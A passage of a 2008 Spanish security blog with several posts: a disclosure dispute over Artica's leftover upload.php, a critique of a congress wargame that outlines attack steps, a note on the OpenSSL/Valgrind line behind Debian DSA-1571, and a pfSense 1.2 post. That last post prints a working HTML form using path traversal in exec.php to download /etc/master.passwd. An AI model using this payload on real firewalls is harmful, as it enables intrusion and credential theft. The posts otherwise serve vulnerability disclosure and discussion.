no, no, no, no me entiendes, quiero una respuesta clara, quiero saber que es lo que pasa, acabo de bajar la última versión de artica (artica-postfix-1.2.101718.deb) para debian y el archivo sigue allí. Entonces eso significa que las personas que usen artica sobre debian son vulnerables?, existe algun archivo donde se mencione esto?, deberia haber una advertencia.

dev: (un poco mas alterado)
Que no ohme, seguro cuando hiciste una actualización el archivo se mantuvo ahí y por eso crees que lo estas instalando. Solo borralo y olvida el asunto.

yo:
Hola!, ya realize una instalación desde cero y el archivo apareció :)
nando:/home/nando/Desktop# ls -la /usr/share/artica-postfix/upload.php

-rw-r--r-- 1 root root 713 oct 17 11:13 /usr/share/artica-postfix/upload.php
nando:/home/nando/Desktop#

dev: ...

Como el asunto no podia quedar ahí entre al foro público de artica y publique una entrada, la cual el mismo desarrollador contesto e inmediatamente cerro el topic.
Para mi ya era el colmo, no me daba explicaciones y se hacia el loco con el tema.

Entonces abrí un segundo tema y le dije que pilas, que las cosas no eran así y realmente las comunidades de software libre no funcionan así. Ocultar las cosas no es una buena politica.

El desarrollador muy amablemente devolvio a la vida mi topic y me escribio un último correo diciendome: "Yes you right my script do incremental copies when creating deb packages so it still exists. It is fixed for next version...."

Mi respuesta fue:
...

Y ahi termina la historia.

Seguramente NO se lanzará un advisory acerca de esto y seguramente algunas cuantas maquinas corriendo artica serán atacadas, pero cumpli con hacer mi parte.

Aveces la neglicencia o el simple hecho de no reconocer que se comete un error, hacen que los procesos en comunidad no evolucionen de la mejor forma. Si el desarrollador se hubiera portado mejor, seguro me hubiera motivado a entregarle otros bugs mas interesantes, pero por ahora dejemoslo ahí.

Byte.

! A Crazy WARGAME !

2008-10-14T20:17:00.009-05:00

Note: Todo lo que expongo aquí es de manera personal y es producto solo de la frustración de querer divertirme y no poder hacerlo. :p

Todo el mundo conoce lo que son los wargames, que son de varios estilos, que pueden haber wargames de programación, de redes, de seguridad y de cualquier otra cosa, pero casi siempre el enfoque es seguridad informática ó hacking.

El pasado puente se realizó un congreso en Cartagena, donde se presentó un reto informático.

Como siempre la idea es ganar o al menos entender de lo que se trataba y entender como se resuelve. Esta vez, ni lo uno, ni lo otro.

Jugué con un par de amigos de la comunidad dragonjar, pues a través de ellos pude conseguir la entrada (gracias 4v4t4r).

Los objetivos de un wargame casi siempre están claros, lo que casi nunca se expone es el COMO hacerlo, que ahí es donde entra en juego las habilidades de los jugadores. En este wargame no teniamos ninguna de las dos cosas, solo teníamos un poco de información de lo que se trataba.

Entonces el asunto fue algo complicado...

Recursos:
SIN acceso a Internet + Conocimientos propios + Tools y Laptops.

Objetivo:
Penetrar una red wifi conocida (WEP, WPA2), Hacer un deface (en algún lugar, en algún S.O.) y cambiar datos en una base de datos (alguna base de datos, en algún lugar).

Como ven, teníamos algunas limitaciones, pero después de pensarlo mucho, este juego termino por gustarme, ya que me da ideas para cuando programe mis propios wargames y me hace reflexionar acerca de la mente de un atacante.

///////////////

Al inicio del juego no sabíamos por donde empezar y quizás nunca tuvimos la orientación de lo que queríamos encontrar exactamente, esto debe ser lo que siente un script kidie, cuando quiere "hackear" algo, pero finalmente no sabe que o para que.

Es muy diferente a la mentalidad de un atacante con un objetivo fijo donde dice: Voy por una base de datos de usuarios que esta en X maquina y listo, enfoca sus esfuerzos a lograrlo.

Aunque teníamos un QUE, no sabíamos exactamente donde se desarrollaria el Juego.

Después de la charla del ponente que realizó el montaje del wargame, entendimos que su mentalidad era algo diferente, quizás no quería organizar un reto "ganable" o quizás quería demostrar lo bueno que es configurando una red segura.

El punto en cuestión y con lo que no estuve de acuerdo fue cuando mencionó que este wargame estaba diseñado basado en el mundo real, algo que me parecío muy ilógico de lo que había podido analizar hasta ese momento, en fin, el asunto no es criticar, ni decir que estuvo bien o no bien hecho. El asunto es analizar que un reto de estos en un congreso debería estar orientado a motivar a los asistentes para que practiquen y desarrollen habilidades y no a demostrar que tan buenos pueden ser unos productos o que tan "tesos" son los que los implementan.

Jugando el wargame a ciegas ...

1. WEP y WPA

El punto de inicio era fácil, había que romper una llave WEP o WPA para ingresar a la red del juego, sus SSID: e-byte y e-byte2.

Ya todos sabemos las herramientas que existen para crackear llaves, pero también sabemos que estas técnicas tienen limitaciones como por ejemplo el trafico que debe existir en los AP para que la inyección de datos sea efectiva ...

El punto en contra era que ninguno de los dos AP's tenia tráfico inicialmente y encima, tenían instalado un sistema que "baneaba" intentos fallidos, escaneos y etc. Los productos son de aruba, me imagino que en producción deben ser muy buenos, pero son necesarios para un wargame?

Intentamos varias técnicas para conseguir el acceso a los AP.

Acceso físico

Intentamos acceder físicamente a los equipos del reto, suponiendo que estaban en un cuarto de operaciones cercano al lugar del evento, pero no fue posible, puesto que estaba todo el tiempo con personas. (el disfraz de camarera no funciono!, tampoco el de señora del aseo)
Intentamos desconectar un AP en producción para ubicarlo en nuestro switch, pero el único cable de red que llevábamos no funcionó, luego pensamos en desconectar el AP pero desconectaríamos muchos usuarios reales y esto llamaría la atención.

Ingeniería social

Rastreamos el mejor lugar con señal para ubicarnos en este y así tener mas posibilidades, al mismo tiempo el ubicarnos en un mismo lugar, hace que el resto de competidores se sientan intimidados y se ubiquen en lugares aparte, normalmente al otro extremo , lo que les dificulta la conexión para ellos.

Intentamos hacer ingeniería social con organizadores y ponentes, pero ninguno tenia información técnica del montaje, sin embargo la información que nos brindaron no solo nos desviaron a nosotros, si no a todos los participantes.
Usar camisetas puede parecer un poco lammer, pero dependiendo del escenario logra que las personas se predispongan y por lo tanto muchos ni siquiera intenten jugar ;)

Finalmente encontramos la WEP ...

Un punto para el wargame fue que ambas redes WEP y WPA accedían al mismo lugar, entonces intentar romper las dos era perdida de tiempo, pero nunca nadie dijo que este era el escenario, me parece chevere esta implementación, dos accesos que van al mismo lugar dividen los esfuerzos (:p), pero para mi, no es un escenario real.

Al finalizar hablamos con el ponente y nos contó que la llave WPA era algo como:

"%&@·1234567"

Por lo que con HANDSHAKE o sin HANDSHAKE, esa clave nunca se hubiera podido romper.

Obviamente el HADSHAKE nunca se obtuvo, porque nunca se conecto un solo cliente.

Pretendían que rompiéramos WPA2 en día y medio sin conexión a Internet? ;)

2. MAPEANDO, ENUMERACIÓN, SCANNING

Ya dentro de la red sacamos la info que pudimos, vimos algunos equipos conectados y nos dimos cuenta que teníamos asignada una dirección dinámica pero que el gateway no respondía y el mismo gateway era el servidor DNS.

Al principio pensábamos que esa maquina era ficticia, después tendríamos la respuesta.
Escaneamos el resto de las maquinas, todas aparecían con los mismos puertos: 80, 3128, 8080, 8888 y dos de ellas con los puertos de VPN. El problema era que todos los puertos respondían de la misma forma, porque tenían TCPWRAPPERS y ademas cada host tenia un portal cautivo que nunca supimos cual era, o como pasarlo, pues redireccionaba a un mensaje de error de acceso administrativo.

Ahí fue cuando empezamos a llorar... (lol)

Hablando con el ponente, nos explico que en la red donde estabamos habian varios equipos y que podía haber un filtro y un sistema IDS en appliance y ademas un sonicwall antiTODO, pero que si no podíamos pasar eso, entonces él con gusto bajaría el nivel del reto retirando algunos equipos (routers, switchs, appliances).

Agrrrrr... :S

Vuelve y juega la pregunta,

¿La idea era que jugáramos o que viéramos que la implementación era excelente ?
¿Lo era ?

En este punto ya se habían retirado el 98% de los participantes, primero porque no habían podido romper las llaves y segundo, porque sospechaban lo que les esperaba.

Hasta ahí llevábamos el primer punto, entonces decidimos crear un documento y entregarlo por si las moscas. De todos modos seguimos jugando.

Mas adelante el ponente nos contó que lo que pasaba era que tenia un port knocker y que por eso no veíamos nada abierto, entonces intentamos pasar el port knocker pero la secuencia de puertos nunca la supimos y a la pregunta de cual era el cliente para pasarla, nos contesto que el cliente estaba en un archivo en alguna otra de las maquinas, que tenia un nombre raro y concluimos que esas maquinas estaban filtradas con el portal cautivo y de esa forma NUNCA íbamos a poder encontrar los tales archivos clientes.

Para los que entienden del tema, saben que hay scanners que se basan en bases de datos para enumerar directorios y archivos de un servidor web, pero para que sea efectivo el ataque con algo así se requiere:

a. TENER EL PUERTO ESCUCHANDO (no lo teníamos TCPWRAPPERS + PORTAL CAPTIVO)
b. QUE EL NOMBRE BUSCADO ESTE EN LA BD
(no lo creo, el archivo deberia tener una combinación alfa numérica imposible)

3. DIA DE LA DECEPCIÓN ...

Ya cansados de pelear y sin tocar mar por culpa del juego, decidimos esperar las conclusiones.

El ponente explico de una forma muy elocuente el reto, pero nunca respondió técnicamente al COMO pasarlas, pero lo que dejo ver es que todo debía llegar por iluminación, y nosotros aún no llegamos hasta allá :P

La respuesta era algo como: "A uno se le ocurre que la maquina 172.16.55.8 esta en la VLAN 230 ..."

Y estos fueron los tips para pasar el reto:

Jajaja, yo trate de entenderlo un poco más.

Aquí va:

COMO RESOLVER EL RETO INFORMÁTICO - CARTAGENA 2008

1. Crackear una llave WEP o WPA2, cualquiera de las dos lo llevan al mismo lugar, pero tenga en cuenta que no hay clientes en los AP.

2. Una vez adentro, mapear la red, pero todo el tráfico ICMP estaba filtrado, por lo tanto nunca se sabia si estaban activos o no los equipos, el uso de sniffers era obligatorio, pero para ver el trafico, había que envenenar el switch y luego ADIVINAR que la IP 192.168.1.10 (corriendo IPCOP) tenia un servidor portknocker, por lo tanto no se pueden ver los servicios, la solución es encontrar un archivo de configuración cliente en algún lugar de la red y luego descifrarlo para poderlo usar.

El archivo al parecer estaba en la maquina 192.168.1.100 (se obtiene por adivinación), pero para poder alcanzar el archivo tendríamos que hacer spoofing de direcciones IP y luego pasarnos la seguridad de un portal captivo (quizas clonando la MAC) y cuando ya pudíeramos entrar al servidor ADIVINAR el nombre del archivo y la extensión que este usaba.

Después era muy fácil, solo descargarlo, si es que el IPS no lo filtraba. Existen muchísimas soluciones de port knocking, sin Internet es complicado apuntarle a una.

3. Cuando tuviéramos acceso a la maquina .10, teníamos que escanearla y encontrar que estaba abierto el puerto 2000, aunque apareciera filtrado, y luego deducir que ese 2000 era realmente una pasarela (forwarding) para el otro lado B del juego.

Al entrar al lado B, teniamos que caer en cuenta que estabamos en una VLAN con un switch 3com (quitaron el switch cisco) que no tenia IP administrativa, pero de todos modos debíamos hackear el switch o reprogramarle un firmware usando el protocolo TFTP.

El problema es que el acceso desde el TFTP solo se permitia desde una maquina confiable protegida por un Firewall, por lo tanto habia que penetrar esta maquina para poder montarle una imagen y luego hacer que el switch la descargará. (Obviamente habia que saltarse el portal captivo para atacar la maquina ). Pero fácil, ahí estariamos en el switch, supongo que con clave by default. (lol)

Una vez en el switch tendriamos que cambiarnos a una VLAN donde estuvieran los servidores a comprometer .

4. Una vez conectados en la VLAN correcta debíamos escanear las maquinas y encontrar que tenian plugines/ejemplos de tomcat vulnerables, los cuales debíamos explotar y de esa forma tener acceso a la maquina, ya estando allí solo tendríamos que hacer el deface. Y listo, el reto dos estaría cumplido.

5. Luego debíamos pasarnos de VLAN y escanear la red por otro equipo, pasarnos la protección del firewall y entrar a la BD que era MySQL, cambiar los registros correctos y listo, el primer puesto seria nuestro.

Eso fue lo que entendí del reto, de lo que teníamos que hacer, le agradezco a los que montaron este wargame porque me abrió los ojos, porque si hay alguien que para prevenir un deface se tome esas molestias, entonces de seguridad yo no se nada :P

Como vieron era un reto que mezclaba un poco de todo, yo creo que es viable ganarlo, siempre y cuando tengamos unos 15 días para jugar y no 1 día y medio como estaba planteado.

¿Lo que me dejó preocupado es que si ese es un ambiente real entonces que es esto un día despues del congreso?, ¿no importa un deface in the real, real life ?

(Empresa que colaboró en el montaje del wargame - donado por un usuario anónimo)

PD1: Todas las gráficas que aparecen fueron del cierre del juego, NO antes de empezarlo. Las conclusiones que saco son mias y son hipoteticas, puedo estar equivocado, pero es lo que concluí después de escuchar al ponente y de todo lo que analizamos.

PD2: hackerslab, pulltheplug, ngsec, boinasnegras, hasta el reto de la campus se quedo en palotes!

PD3: De todos modos GANAMOS, nos premiaron (a la perseverancia? ), invitación a próximos congresos y la fiesta en Mr. Babilla.

PD4: Me falto contarles que el lado A y el lado B del reto se conectaban usando protocolos X10 que transmiten sobre el cableado eléctrico. la respuesta del ponente a mi sorpresa fué:

" Ah!, no lo vieron?, el tráfico por ahí estaba desencriptado, podían haberlo esnifeado!".

Lastima que no lleve mi plugin de wireshark para X10 y menos el conversor de 110V para el Assus! :P

2008-10-14T20:14:00.001-05:00

Sean Legales !!

Como mi hermana ...

JSL 2008 - Jornadas de Software Libre

2008-10-13T17:30:00.002-05:00

[OT] Un buen MRASAJE

2008-08-31T22:22:00.003-05:00

Esto que tiene que ver con el perfil técnico del blog?

!!! NADA !!!

Pero queria agradecerle a mi progenitora por el delicioso MRASAJE que me practico esta noche.

Que es un MRASAJE?, pues es un triple combo o un killer combo como dirian algunos por ahí, solo se puede usar cuando el cuerpo lo pide a gritos:

MOXIBUSTIÓN + REIKI + ACUPUNTURA * ( MASAJE ) = MRASAJE

Alguna de las ventajas de ser un Geek con mamá terapeuta.
Una vez realizada la terapia puedo compilar mejor.
Quíen dijo que un Geek no puede hacer otras cosas?

Perdón por el offtopic. :D

Si, mientras me masajeaban seguia compilando y buscando bugs.

See yaa!

Just 4 remember

2008-08-30T22:28:00.003-05:00

year 2003 ...

"At lines 467-469 in crypto/rand/md_rand.c is an interesting
thing:

#ifndef PURIFY
MD_Update(&m,buf,j); /* purify complains */
#endif

That is the code that causes the problem (I just verified
it with Valgrind). Does it have any bad side affects to
always skip that code? Since both Purify and Valgrind is
unhappy with that function call, something must be wrong
with it."

LOL.
is perfect Valgrind ?

Este texto empieza exactamente con la respuesta al problema de hace unos meses de Debian (http://www.debian.org/security/2008/dsa-1571):

"That is the code that causes the problem ..."

Jeje, será que ya sabia lo que iba a ocasionar?

PD: una mala premisa.

I don like it

2008-08-28T09:18:00.004-05:00

Estaba haciendo unas pruebas y leí un poco del código, realmente se ve muy buggy, no pienso ir mas allá, lo dejo para que alguien mas se anime ;)

Ningun archivo valida ingreso de parámetros, la función de borrado masivo es vuln, permitiendo eliminar completamente un dominio, posiblemente se pueda hacer LDAP injection o cosas así. Lo verifique en la versión que aparece en el screenshot, no he probado nada en las versiones en desarrollo.

Lo delicado del asunto es que a traves de un sistema web vulnerable, pueda tener control total de un PDC.

Bug and exploit for Pfsense v1.2

2008-08-07T21:23:00.007-05:00

Por donde atacarias un firewall?

Un exploit?
bash-3.2# cat ataque.html


<form name="ataque" method="post" action="http://192.168.20.200/exec.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Ataque</td>
<td><input name="submit" type="text" id="victima" value="Download"></td>
<td><input name="dlPath" type="text" id="victima2" value="../../../../../../../etc/master.passwd"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="submit" value="Download"></td>
</tr>
</table>
</form>

Donde, 192.168.20.200 es ?

Yo solo quiero descargarme el /etc/master.passwd del firewall.

(thx astrid por la inspiración, jeje)

Un fix silencioso ...

de:
http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.11.2.1

a:
http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.13

bye ...